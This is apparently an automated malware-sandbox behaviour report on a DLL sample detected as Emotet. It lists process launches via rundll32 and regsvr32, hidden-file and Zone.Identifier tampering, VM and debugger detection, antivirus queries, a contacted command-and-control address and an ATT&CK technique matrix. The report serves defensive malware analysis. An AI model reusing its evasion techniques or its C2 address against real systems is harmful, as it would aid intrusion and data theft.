                      Source: unknownProcess created: C:\Windows\System32\svchost.exe C:\Windows\System32\svchost.exe -k netsvcs -p
                      Source: unknownProcess created: C:\Windows\System32\svchost.exe C:\Windows\System32\svchost.exe -k netsvcs -p
                      Source: unknownProcess created: C:\Windows\System32\svchost.exe C:\Windows\system32\svchost.exe -k wusvcs -p -s WaaSMedicSvc
                      Source: C:\Windows\System32\svchost.exeProcess created: C:\Program Files\Windows Defender\MpCmdRun.exe "C:\Program Files\Windows Defender\mpcmdrun.exe" -wdenable
                      Source: C:\Program Files\Windows Defender\MpCmdRun.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                      Source: unknownProcess created: C:\Windows\System32\svchost.exe C:\Windows\System32\svchost.exe -k netsvcs -p
                      Source: unknownProcess created: C:\Windows\System32\svchost.exe C:\Windows\System32\svchost.exe -k netsvcs -p
                      Source: C:\Windows\System32\loaddll64.exeProcess created: C:\Windows\System32\cmd.exe cmd.exe /C rundll32.exe "C:\Users\user\Desktop\yj81rxDZIp.dll",#1Jump to behavior
                      Source: C:\Windows\System32\loaddll64.exeProcess created: C:\Windows\System32\regsvr32.exe regsvr32.exe /s C:\Users\user\Desktop\yj81rxDZIp.dllJump to behavior
                      Source: C:\Windows\System32\loaddll64.exeProcess created: C:\Windows\System32\rundll32.exe rundll32.exe C:\Users\user\Desktop\yj81rxDZIp.dll,DllRegisterServerJump to behavior
                      Source: C:\Windows\System32\loaddll64.exeProcess created: C:\Windows\System32\rundll32.exe rundll32.exe C:\Users\user\Desktop\yj81rxDZIp.dll,DllUnregisterServerJump to behavior
                      Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\rundll32.exe rundll32.exe "C:\Users\user\Desktop\yj81rxDZIp.dll",#1Jump to behavior
                      Source: C:\Windows\System32\rundll32.exeProcess created: C:\Windows\System32\regsvr32.exe C:\Windows\system32\regsvr32.exe "C:\Windows\system32\NaMuLvbxXsNvT\LkWax.dll"Jump to behavior
                      Source: C:\Windows\System32\svchost.exeProcess created: C:\Program Files\Windows Defender\MpCmdRun.exe "C:\Program Files\Windows Defender\mpcmdrun.exe" -wdenableJump to behavior
                      Source: C:\Windows\System32\regsvr32.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{D105A4D4-344C-48EB-9866-EE378D90658B}\InProcServer32Jump to behavior
                      Source: classification engineClassification label: mal84.troj.evad.winDLL@28/6@0/3
                      Source: C:\Windows\System32\regsvr32.exeFile read: C:\Users\desktop.iniJump to behavior
                      Source: C:\Windows\System32\regsvr32.exeCode function: 6_2_00000001800046A8 CreateToolhelp32Snapshot,Process32FirstW,FindCloseChangeNotification,6_2_00000001800046A8
                      Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\rundll32.exe rundll32.exe "C:\Users\user\Desktop\yj81rxDZIp.dll",#1
                      Source: C:\Windows\System32\conhost.exeMutant created: \BaseNamedObjects\Local\SM0:6996:120:WilError_01
                      Source: C:\Windows\System32\svchost.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
                      Source: C:\Windows\System32\svchost.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
                      Source: C:\Windows\System32\svchost.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
                      Source: C:\Windows\System32\svchost.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
                      Source: C:\Windows\System32\svchost.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
                      Source: C:\Windows\System32\svchost.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
                      Source: yj81rxDZIp.dllStatic PE information: Image base 0x180000000 > 0x60000000
                      Source: yj81rxDZIp.dllStatic PE information: DYNAMIC_BASE, NX_COMPAT
                      Source: Binary string: msacm32.pdb source: regsvr32.exe, 00000006.00000002.662014992.0000000000F35000.00000004.00000010.00020000.00000000.sdmp
                      Source: Binary string: msacm32.pdbGCTL source: regsvr32.exe, 00000006.00000002.662014992.0000000000F35000.00000004.00000010.00020000.00000000.sdmp
                      Source: C:\Windows\System32\regsvr32.exeCode function: 2_2_000000018001AFFD push ebp; retf 2_2_000000018001AFFE
                      Source: C:\Windows\System32\regsvr32.exeCode function: 2_2_00000001800051D1 push ebp; iretd 2_2_00000001800051D2
                      Source: C:\Windows\System32\regsvr32.exeCode function: 2_2_000000018001BA32 push ebp; retf 2_2_000000018001BA33
                      Source: C:\Windows\System32\regsvr32.exeCode function: 2_2_0000000180004E83 push es; ret 2_2_0000000180004E84
                      Source: C:\Windows\System32\regsvr32.exeCode function: 2_2_000000018001B694 push es; ret 2_2_000000018001B6E9
                      Source: C:\Windows\System32\regsvr32.exeCode function: 2_2_000000018001BADD push ebp; iretd 2_2_000000018001BADE
                      Source: C:\Windows\System32\regsvr32.exeCode function: 2_2_000000018001B717 push ebp; iretd 2_2_000000018001B718
                      Source: C:\Windows\System32\regsvr32.exeCode function: 2_2_0000000180007B3F push esp; retf 2_2_0000000180007B40
                      Source: C:\Windows\System32\regsvr32.exeCode function: 2_2_000000018001AF4E push ebp; retf 2_2_000000018001AF4F
                      Source: C:\Windows\System32\rundll32.exeCode function: 3_2_000000018001AFFD push ebp; retf 3_2_000000018001AFFE
                      Source: C:\Windows\System32\rundll32.exeCode function: 3_2_00000001800051D1 push ebp; iretd 3_2_00000001800051D2
                      Source: C:\Windows\System32\rundll32.exeCode function: 3_2_000000018001BA32 push ebp; retf 3_2_000000018001BA33
                      Source: C:\Windows\System32\rundll32.exeCode function: 3_2_0000000180004E83 push es; ret 3_2_0000000180004E84
                      Source: C:\Windows\System32\rundll32.exeCode function: 3_2_000000018001B694 push es; ret 3_2_000000018001B6E9
                      Source: C:\Windows\System32\rundll32.exeCode function: 3_2_000000018001BADD push ebp; iretd 3_2_000000018001BADE
                      Source: C:\Windows\System32\rundll32.exeCode function: 3_2_000000018001B717 push ebp; iretd 3_2_000000018001B718
                      Source: C:\Windows\System32\rundll32.exeCode function: 3_2_000000018001AF4E push ebp; retf 3_2_000000018001AF4F
                      Source: C:\Windows\System32\rundll32.exeCode function: 4_2_000000018001AFFD push ebp; retf 4_2_000000018001AFFE
                      Source: C:\Windows\System32\rundll32.exeCode function: 4_2_00000001800051D1 push ebp; iretd 4_2_00000001800051D2
                      Source: C:\Windows\System32\rundll32.exeCode function: 4_2_000000018001BA32 push ebp; retf 4_2_000000018001BA33
                      Source: C:\Windows\System32\rundll32.exeCode function: 4_2_0000000180004E83 push es; ret 4_2_0000000180004E84
                      Source: C:\Windows\System32\rundll32.exeCode function: 4_2_000000018001B694 push es; ret 4_2_000000018001B6E9
                      Source: C:\Windows\System32\rundll32.exeCode function: 4_2_000000018001BADD push ebp; iretd 4_2_000000018001BADE
                      Source: C:\Windows\System32\rundll32.exeCode function: 4_2_000000018001B717 push ebp; iretd 4_2_000000018001B718
                      Source: C:\Windows\System32\rundll32.exeCode function: 4_2_0000000180007B3F push esp; retf 4_2_0000000180007B40
                      Source: C:\Windows\System32\rundll32.exeCode function: 4_2_000000018001AF4E push ebp; retf 4_2_000000018001AF4F
                      Source: C:\Windows\System32\regsvr32.exeCode function: 6_2_00000001800051D1 push ebp; iretd 6_2_00000001800051D2
                      Source: C:\Windows\System32\regsvr32.exeCode function: 6_2_0000000180004E83 push es; ret 6_2_0000000180004E84
                      Source: C:\Windows\System32\regsvr32.exeCode function: 6_2_0000000180007B3F push esp; retf 6_2_0000000180007B40
                      Source: C:\Windows\System32\regsvr32.exeCode function: 2_2_00007FFC66D77BE8 DecodePointer,_errno,LoadLibraryA,GetProcAddress,_errno,GetLastError,GetLastError,EncodePointer,FreeLibrary,_errno,_errno,2_2_00007FFC66D77BE8
                      Source: yj81rxDZIp.dllStatic PE information: real checksum: 0x85ab6 should be: 0x925b5
                      Source: C:\Windows\System32\loaddll64.exeProcess created: C:\Windows\System32\regsvr32.exe regsvr32.exe /s C:\Users\user\Desktop\yj81rxDZIp.dll
                      Source: C:\Windows\System32\rundll32.exePE file moved: C:\Windows\System32\NaMuLvbxXsNvT\LkWax.dllJump to behavior

                      Hooking and other Techniques for Hiding and Protection

                      barindex
                      Source: C:\Windows\System32\regsvr32.exeFile opened: C:\Windows\system32\FwsVMByehV\ZcvdnH.dll:Zone.Identifier read attributes | deleteJump to behavior
                      Source: C:\Windows\System32\rundll32.exeFile opened: C:\Windows\system32\NaMuLvbxXsNvT\LkWax.dll:Zone.Identifier read attributes | deleteJump to behavior
                      Source: C:\Windows\System32\rundll32.exeFile opened: C:\Windows\system32\IlNwUYqX\NREmlQ.dll:Zone.Identifier read attributes | deleteJump to behavior
                      Source: C:\Windows\System32\rundll32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\rundll32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\rundll32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\rundll32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\rundll32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\regsvr32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior

                      Malware Analysis System Evasion

                      barindex
                      Source: C:\Windows\System32\svchost.exeSystem information queried: FirmwareTableInformationJump to behavior
                      Source: C:\Windows\System32\svchost.exe TID: 2912Thread sleep time: -30000s >= -30000sJump to behavior
                      Source: C:\Windows\System32\svchost.exe TID: 2996Thread sleep time: -30000s >= -30000sJump to behavior
                      Source: C:\Windows\System32\svchost.exe TID: 7028Thread sleep time: -30000s >= -30000sJump to behavior
                      Source: C:\Windows\System32\svchost.exe TID: 4892Thread sleep time: -30000s >= -30000sJump to behavior
                      Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
                      Source: C:\Windows\System32\regsvr32.exeEvasive API call chain: GetModuleFileName,DecisionNodes,ExitProcessgraph_2-9796
                      Source: C:\Windows\System32\svchost.exeFile opened: PhysicalDrive0Jump to behavior
                      Source: C:\Windows\System32\regsvr32.exeProcess information queried: ProcessInformationJump to behavior
                      Source: C:\Windows\System32\regsvr32.exeCode function: 6_2_000000018000D26C FindFirstFileW,FindNextFileW,FindClose,6_2_000000018000D26C
                      Source: C:\Windows\System32\regsvr32.exeAPI call chain: ExitProcess graph end nodegraph_2-9797
                      Source: C:\Windows\System32\regsvr32.exeFile Volume queried: C:\ FullSizeInformationJump to behavior
                      Source: C:\Windows\System32\rundll32.exeFile Volume queried: C:\ FullSizeInformationJump to behavior
                      Source: svchost.exe, 00000017.00000002.665784764.0000025191C54000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: VMware, Inc.
                      Source: regsvr32.exe, 00000006.00000003.350891510.0000000001393000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 00000006.00000002.664633981.0000000001396000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 00000006.00000003.350871227.0000000001381000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 00000006.00000003.350949690.0000000001396000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW.
                      Source: svchost.exe, 00000010.00000002.610485048.000001C894A29000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW O&
                      Source: rundll32.exe, 00000004.00000002.279832113.00000198938D8000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: \??\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#5&280b647&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}b8b}0N
                      Source: svchost.exe, 00000017.00000002.663208910.0000025190CBC000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAWsettings-win.data.micros
                      Source: svchost.exe, 00000017.00000002.665784764.0000025191C54000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: VMware7,1
                      Source: svchost.exe, 00000017.00000002.663166808.0000025190C9F000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: VMware Virtual RAM00000001VMW-4096MBRAM slot #0RAM slot #0
                      Source: regsvr32.exe, 00000006.00000003.350891510.0000000001393000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 00000006.00000002.664633981.0000000001396000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 00000006.00000003.350871227.0000000001381000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 00000006.00000003.350949690.0000000001396000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 00000006.00000002.664578295.0000000001381000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000010.00000002.610995101.000001C89A256000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000017.00000002.663008476.0000025190C5B000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000017.00000002.663237281.0000025190CCE000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000001F.00000002.583772838.000002B2430EE000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000001F.00000002.583107378.000002B2430CB000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW
                      Source: svchost.exe, 00000007.00000002.662331781.000002B487802000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: HvHostWdiSystemHostScDeviceEnumWiaRpctrkwksAudioEndpointBuilderhidservdot3svcDsSvcfhsvcWPDBusEnumsvsvcwlansvcEmbeddedModeirmonSensorServicevmicvssNgcSvcsysmainDevQueryBrokerStorSvcvmickvpexchangevmicshutdownvmicguestinterfacevmicvmsessionNcbServiceNetmanDeviceAssociationServiceTabletInputServicePcaSvcIPxlatCfgSvcCscServiceUmRdpService
                      Source: svchost.exe, 00000017.00000002.663166808.0000025190C9F000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: VMware-42 35 d8 20 48 cb c7 ff-aa 5e d0 37 a0 49 53 d7
                      Source: svchost.exe, 00000017.00000002.663166808.0000025190C9F000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: VMware SVGA IIES1371
                      Source: svchost.exe, 00000017.00000002.663166808.0000025190C9F000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: VMware Virtual RAM
                      Source: svchost.exe, 00000010.00000002.611006767.000001C89A263000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: @Hyper-V RAWGlobal\BFE_Notify_Event_{dbf2d3f4-30ee-4d3e-8ee8-958b88796ec1}LMEM
                      Source: rundll32.exe, 00000004.00000002.279832113.00000198938D8000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: \??\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#5&280b647&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\
                      Source: svchost.exe, 00000017.00000002.663166808.0000025190C9F000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: VMware, Inc.NoneVMware-42 35 d8 20 48 cb c7 ff-aa 5e d0 37 a0 49 53 d7VMware7,1
                      Source: svchost.exe, 00000017.00000002.663166808.0000025190C9F000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: VMware SVGA II
                      Source: svchost.exe, 00000017.00000002.663166808.0000025190C9F000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: VMware, Inc.VMW71.00V.18227214.B64.210625222006/25/2021
                      Source: svchost.exe, 00000007.00000002.662654874.000002B487840000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000008.00000002.662712631.000002460FC40000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000009.00000002.662629571.000002C9FD029000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll
                      Source: C:\Windows\System32\regsvr32.exeCode function: 2_2_00007FFC66D76550 RtlCaptureContext,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,2_2_00007FFC66D76550
                      Source: C:\Windows\System32\regsvr32.exeCode function: 2_2_00007FFC66D77BE8 DecodePointer,_errno,LoadLibraryA,GetProcAddress,_errno,GetLastError,GetLastError,EncodePointer,FreeLibrary,_errno,_errno,2_2_00007FFC66D77BE8
                      Source: C:\Windows\System32\loaddll64.exeProcess queried: DebugPortJump to behavior
                      Source: C:\Windows\System32\regsvr32.exeCode function: 2_2_00007FFC66D7D318 RtlCaptureContext,SetUnhandledExceptionFilter,UnhandledExceptionFilter,2_2_00007FFC66D7D318
                      Source: C:\Windows\System32\regsvr32.exeCode function: 2_2_00007FFC66D76550 RtlCaptureContext,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,2_2_00007FFC66D76550
                      Source: C:\Windows\System32\regsvr32.exeCode function: 2_2_00007FFC66D720E0 RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,2_2_00007FFC66D720E0

                      HIPS / PFW / Operating System Protection Evasion

                      barindex
                      Source: C:\Windows\System32\regsvr32.exeNetwork Connect: 23.239.0.12 443Jump to behavior
                      Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\rundll32.exe rundll32.exe "C:\Users\user\Desktop\yj81rxDZIp.dll",#1Jump to behavior
                      Source: C:\Windows\System32\regsvr32.exeQueries volume information: C:\ VolumeInformationJump to behavior
                      Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.chk VolumeInformationJump to behavior
                      Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.log VolumeInformationJump to behavior
                      Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.chk VolumeInformationJump to behavior
                      Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.log VolumeInformationJump to behavior
                      Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.log VolumeInformationJump to behavior
                      Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.log VolumeInformationJump to behavior
                      Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.chk VolumeInformationJump to behavior
                      Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ProgramData\Microsoft\Network\Downloader\qmgr.db VolumeInformationJump to behavior
                      Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ProgramData\Microsoft\Network\Downloader\qmgr.jfm VolumeInformationJump to behavior
                      Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ProgramData\Microsoft\Network\Downloader\qmgr.db VolumeInformationJump to behavior
                      Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ProgramData\Microsoft\Network\Downloader\qmgr.db VolumeInformationJump to behavior
                      Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ VolumeInformationJump to behavior
                      Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ VolumeInformationJump to behavior
                      Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.chk VolumeInformationJump to behavior
                      Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.chk VolumeInformationJump to behavior
                      Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.chk VolumeInformationJump to behavior
                      Source: C:\Windows\System32\regsvr32.exeCode function: GetLocaleInfoW,2_2_00007FFC66D7DF3C
                      Source: C:\Windows\System32\regsvr32.exeCode function: GetLocaleInfoW,2_2_00007FFC66D7DF20
                      Source: C:\Windows\System32\regsvr32.exeCode function: _getptd,GetLocaleInfoA,2_2_00007FFC66D7C6E4
                      Source: C:\Windows\System32\regsvr32.exeCode function: _getptd,GetLocaleInfoA,2_2_00007FFC66D7C2B4
                      Source: C:\Windows\System32\regsvr32.exeCode function: _getptd,GetLocaleInfoA,GetLocaleInfoA,GetLocaleInfoA,2_2_00007FFC66D7C450
                      Source: C:\Windows\System32\regsvr32.exeCode function: EnumSystemLocalesA,2_2_00007FFC66D7C834
                      Source: C:\Windows\System32\regsvr32.exeCode function: EnumSystemLocalesA,2_2_00007FFC66D7C7F4
                      Source: C:\Windows\System32\regsvr32.exeCode function: GetLocaleInfoA,2_2_00007FFC66D7C39C
                      Source: C:\Windows\System32\regsvr32.exeCode function: GetLocaleInfoW,GetLastError,GetLocaleInfoW,GetLocaleInfoW,WideCharToMultiByte,free,GetLocaleInfoA,2_2_00007FFC66D7DF98
                      Source: C:\Windows\System32\regsvr32.exeCode function: GetLocaleInfoA,GetLocaleInfoA,GetACP,2_2_00007FFC66D7C16C
                      Source: C:\Windows\System32\regsvr32.exeCode function: _getptd,EnumSystemLocalesA,GetUserDefaultLCID,IsValidCodePage,IsValidLocale,GetLocaleInfoA,GetLocaleInfoA,_itow_s,2_2_00007FFC66D7C934
                      Source: C:\Windows\System32\regsvr32.exeCode function: EnumSystemLocalesA,2_2_00007FFC66D7C8C8
                      Source: C:\Windows\System32\regsvr32.exeCode function: GetLocaleInfoA,2_2_00007FFC66D7E1E8
                      Source: C:\Windows\System32\regsvr32.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuidJump to behavior
                      Source: C:\Windows\System32\regsvr32.exeCode function: 2_2_00007FFC66D74558 GetSystemTimeAsFileTime,GetCurrentProcessId,GetCurrentThreadId,GetTickCount,QueryPerformanceCounter,2_2_00007FFC66D74558
                      Source: C:\Windows\System32\regsvr32.exeCode function: 2_2_00007FFC66D7E6C0 _lock,___lc_codepage_func,free,free,GetTimeZoneInformation,WideCharToMultiByte,WideCharToMultiByte,2_2_00007FFC66D7E6C0

                      Lowering of HIPS / PFW / Operating System Security Settings

                      barindex
                      Source: C:\Windows\System32\svchost.exeKey value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Security Center cvalJump to behavior
                      Source: C:\Windows\System32\svchost.exeWMI Queries: IWbemServices::ExecNotificationQuery - ROOT\SecurityCenter : SELECT * FROM __InstanceOperationEvent WHERE TargetInstance ISA 'AntiVirusProduct' OR TargetInstance ISA 'FirewallProduct' OR TargetInstance ISA 'AntiSpywareProduct'
                      Source: C:\Windows\System32\svchost.exeWMI Queries: IWbemServices::CreateInstanceEnum - ROOT\SecurityCenter2 : FirewallProduct
                      Source: C:\Windows\System32\svchost.exeWMI Queries: IWbemServices::CreateInstanceEnum - ROOT\SecurityCenter2 : AntiVirusProduct
                      Source: C:\Windows\System32\svchost.exeWMI Queries: IWbemServices::CreateInstanceEnum - ROOT\SecurityCenter2 : AntiSpywareProduct
                      Source: svchost.exe, 00000017.00000002.665419407.00000251915F1000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: \BullGuard Ltd\BullGuard\BullGuard.exe
                      Source: svchost.exe, 0000000D.00000002.662812249.000001971A502000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: %ProgramFiles%\Windows Defender\MsMpeng.exe

                      Stealing of Sensitive Information

                      barindex
                      Source: Yara matchFile source: 4.2.rundll32.exe.198952a0000.1.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 3.2.rundll32.exe.26800000000.1.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 3.2.rundll32.exe.26800000000.1.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 2.2.regsvr32.exe.1fd0000.0.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 6.2.regsvr32.exe.12f0000.1.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 4.2.rundll32.exe.198952a0000.1.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 6.2.regsvr32.exe.12f0000.1.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 2.2.regsvr32.exe.1fd0000.0.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 00000004.00000002.279543824.0000000180001000.00000020.00001000.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000003.00000002.280535060.0000026800000000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000002.00000002.277397167.0000000001FD0000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000002.00000002.277694127.0000000180001000.00000020.00001000.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000003.00000002.280399426.0000000180001000.00000020.00001000.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000006.00000002.662769151.00000000012F0000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000004.00000002.280320668.00000198952A0000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000006.00000002.665142316.0000000180001000.00000020.00001000.00020000.00000000.sdmp, type: MEMORY
                      Initial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionExfiltrationCommand and ControlNetwork EffectsRemote Service EffectsImpact
                      Valid Accounts1
                      Windows Management Instrumentation
                      1
                      DLL Side-Loading
                      111
                      Process Injection
                      2
                      Masquerading
                      OS Credential Dumping2
                      System Time Discovery
                      Remote Services1
                      Archive Collected Data
                      Exfiltration Over Other Network Medium11
                      Encrypted Channel
                      Eavesdrop on Insecure Network CommunicationRemotely Track Device Without AuthorizationModify System Partition
                      Default Accounts2
                      Native API
                      Boot or Logon Initialization Scripts1
                      DLL Side-Loading
                      1
                      Disable or Modify Tools
                      LSASS Memory151
                      Security Software Discovery
                      Remote Desktop ProtocolData from Removable MediaExfiltration Over Bluetooth2
                      Ingress Tool Transfer
                      Exploit SS7 to Redirect Phone Calls/SMSRemotely Wipe Data Without AuthorizationDevice Lockout
                      Domain AccountsAt (Linux)Logon Script (Windows)Logon Script (Windows)13
                      Virtualization/Sandbox Evasion
                      Security Account Manager13
                      Virtualization/Sandbox Evasion
                      SMB/Windows Admin SharesData from Network Shared DriveAutomated Exfiltration1
                      Non-Application Layer Protocol
                      Exploit SS7 to Track Device LocationObtain Device Cloud BackupsDelete Device Data
                      Local AccountsAt (Windows)Logon Script (Mac)Logon Script (Mac)111
                      Process Injection
                      NTDS2
                      Process Discovery
                      Distributed Component Object ModelInput CaptureScheduled Transfer2
                      Application Layer Protocol
                      SIM Card SwapCarrier Billing Fraud
                      Cloud AccountsCronNetwork Logon ScriptNetwork Logon Script1
                      Hidden Files and Directories
                      LSA Secrets1
                      Remote System Discovery
                      SSHKeyloggingData Transfer Size LimitsFallback ChannelsManipulate Device CommunicationManipulate App Store Rankings or Ratings
                      Replication Through Removable MediaLaunchdRc.commonRc.common1
                      Obfuscated Files or Information
                      Cached Domain Credentials2
                      File and Directory Discovery
                      VNCGUI Input CaptureExfiltration Over C2 ChannelMultiband CommunicationJamming or Denial of ServiceAbuse Accessibility Features
                      External Remote ServicesScheduled TaskStartup ItemsStartup Items1
                      Regsvr32
                      DCSync34
                      System Information Discovery
                      Windows Remote ManagementWeb Portal CaptureExfiltration Over Alternative ProtocolCommonly Used PortRogue Wi-Fi Access PointsData Encrypted for Impact
                      Drive-by CompromiseCommand and Scripting InterpreterScheduled Task/JobScheduled Task/Job1
                      Rundll32
                      Proc FilesystemNetwork Service ScanningShared WebrootCredential API HookingExfiltration Over Symmetric Encrypted Non-C2 ProtocolApplication Layer ProtocolDowngrade to Insecure ProtocolsGenerate Fraudulent Advertising Revenue
                      Exploit Public-Facing ApplicationPowerShellAt (Linux)At (Linux)1
                      DLL Side-Loading
                      /etc/passwd and /etc/shadowSystem Network Connections DiscoverySoftware Deployment ToolsData StagedExfiltration Over Asymmetric Encrypted Non-C2 ProtocolWeb ProtocolsRogue Cellular Base StationData Destruction
                      Supply Chain CompromiseAppleScriptAt (Windows)At (Windows)1
                      File Deletion
                      Network SniffingProcess DiscoveryTaint Shared ContentLocal Data StagingExfiltration Over Unencrypted/Obfuscated Non-C2 ProtocolFile Transfer ProtocolsData Encrypted for Impact
                      Hide Legend

                      Legend:

                      • Process
                      • Signature
                      • Created File
                      • DNS/IP Info
                      • Is Dropped
                      • Is Windows Process
                      • Number of created Registry Values
                      • Number of created Files
                      • Visual Basic
                      • Delphi
                      • Java
                      • .Net C# or VB.NET
                      • C, C++ or other language
                      • Is malicious
                      • Internet
                      behaviorgraph top1 signatures2 2 Behavior Graph ID: 626482 Sample: yj81rxDZIp.dll Startdate: 14/05/2022 Architecture: WINDOWS Score: 84 44 Snort IDS alert for network traffic 2->44 46 Multi AV Scanner detection for submitted file 2->46 48 Yara detected Emotet 2->48 8 loaddll64.exe 1 2->8         started        10 svchost.exe 2->10         started        13 svchost.exe 2->13         started        15 10 other processes 2->15 process3 dnsIp4 18 cmd.exe 1 8->18         started        20 regsvr32.exe 2 8->20         started        23 rundll32.exe 2 8->23         started        25 rundll32.exe 8->25         started        54 Changes security center settings (notifications, updates, antivirus, firewall) 10->54 27 MpCmdRun.exe 1 10->27         started        56 Query firmware table information (likely to detect VMs) 13->56 40 127.0.0.1 unknown unknown 15->40 42 192.168.2.1 unknown unknown 15->42 signatures5 process6 signatures7 29 rundll32.exe 2 18->29         started        52 Hides that the sample has been downloaded from the Internet (zone.identifier) 20->52 32 conhost.exe 27->32         started        process8 signatures9 58 Hides that the sample has been downloaded from the Internet (zone.identifier) 29->58 34 regsvr32.exe 29->34         started        process10 dnsIp11 38 23.239.0.12, 443, 49746 LINODE-APLinodeLLCUS United States 34->38 50 System process connects to network (likely due to code injection or exploit) 34->50 signatures12

